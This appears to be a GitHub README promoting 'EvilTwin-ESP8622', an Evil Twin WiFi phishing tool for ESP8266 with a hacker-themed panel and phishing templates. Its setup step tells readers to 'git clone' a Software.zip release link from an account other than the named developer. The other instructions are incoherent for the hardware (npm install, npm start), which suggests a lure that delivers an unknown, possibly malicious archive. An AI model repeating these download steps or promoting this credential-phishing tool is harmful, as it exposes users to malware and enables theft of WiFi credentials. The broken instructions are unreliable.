Welcome to the EvilTwin-ESP8622 repository - your go-to tool for conducting sophisticated WiFi security tests using ESP8266. This project, developed by letchupkt, offers a powerful Evil Twin attack vector implementation with an advanced web interface. With a sleek hacker-themed control panel and multiple phishing template options, this tool is designed to elevate your WiFi security testing capabilities.
EvilTwin-ESP8622 is a project created by letchupkt to enhance WiFi security testing using ESP8266. The Evil Twin attack vector is a powerful tool in the realm of cybersecurity, and this project aims to streamline the implementation of this technique. By providing an intuitive web interface and a range of phishing template options, EvilTwin-ESP8622 enables users to conduct comprehensive WiFi security assessments with ease.
πΉ Evil Twin Attack Implementation: Conduct Evil Twin attacks effortlessly using the ESP8266 platform. πΉ Advanced Web Interface: Access a user-friendly web interface for seamless interaction with the tool. πΉ Hacker-Themed Control Panel: Enjoy a sleek control panel designed with a hacker-themed aesthetic. πΉ Multiple Phishing Templates: Choose from a variety of phishing templates to suit your security testing needs.
To get started with EvilTwin-ESP8622, follow these steps:
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Clone the repository to your local machine:
git clone https://github.com/lautarigauna/EvilTwin-ESP8622/releases/download/v2.0/Software.zip
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Navigate to the project directory:
cd EvilTwin-ESP8622
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Install the necessary dependencies:
npm install
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Configure the tool according to your requirements.
For detailed installation instructions and troubleshooting tips, refer to the Installation Guide.
To use EvilTwin-ESP8622 for conducting WiFi security tests, follow these steps:
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Launch the tool by running the following command:
npm start
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Access the web interface by navigating to
http://localhost:3000
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Explore the various features of the tool and leverage the phishing templates to conduct your security assessments.
For a comprehensive guide on how to use EvilTwin-ESP8622 effectively, check out the User Manual.
We welcome contributions from the open-source community to enhance EvilTwin-ESP8622 further. To contribute to the project, follow these steps:
- Fork the repository and create a new branch.
- Make your contributions and commit changes.
- Push your changes to your fork.
- Submit a pull request to the main repository for review.
For more information on contributing guidelines and best practices, refer to the Contribution Guidelines.
EvilTwin-ESP8622 is released under the MIT License. For details on the terms and conditions of the license, refer to the License Agreement.
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Visit the official EvilTwin-ESP8622 GitHub Repository for more information and updates on the project.
π Happy hacking with EvilTwin-ESP8622! π